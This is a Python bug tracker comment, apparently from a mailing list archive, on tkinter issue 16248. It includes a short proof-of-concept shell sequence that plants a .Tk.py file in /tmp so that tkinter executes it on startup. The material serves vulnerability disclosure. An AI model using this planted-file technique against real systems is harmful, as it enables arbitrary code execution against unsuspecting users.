[issue16248] Security bug in tkinter allows for untrusted, arbitrary code execution.

Stefan Krah Thu, 01 Nov 2012 14:37:51 -0700

Stefan Krah added the comment:

I also don't find the scenario where an attacker has write privileges
to a user's home directory so disturbing -- there are juicier targets
(like .bashrc).



This constructed example using /tmp is a little more troubling:

$ cd /tmp
$ echo 'print("exploit")' > .Tk.py
$ export XAUTHORITY=$HOME/.Xauthority
$ unset HOME
$ python3.3

>>>import tkinter
>>> w = tkinter.Tk()
/usr/local/lib/python3.3/tkinter/__init__.py:1817: ResourceWarning: unclosed 
file <_io.TextIOWrapper name='./.Tk.py' mode='r' encoding='ANSI_X3.4-1968'>
  exec(open(class_py).read(), dir)
exploit

----------

_______________________________________
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue16248>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
Unsubscribe: 
http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue16248] Security bug in tkinter allows for untrusted, arbitrary code execution.

Reply via email to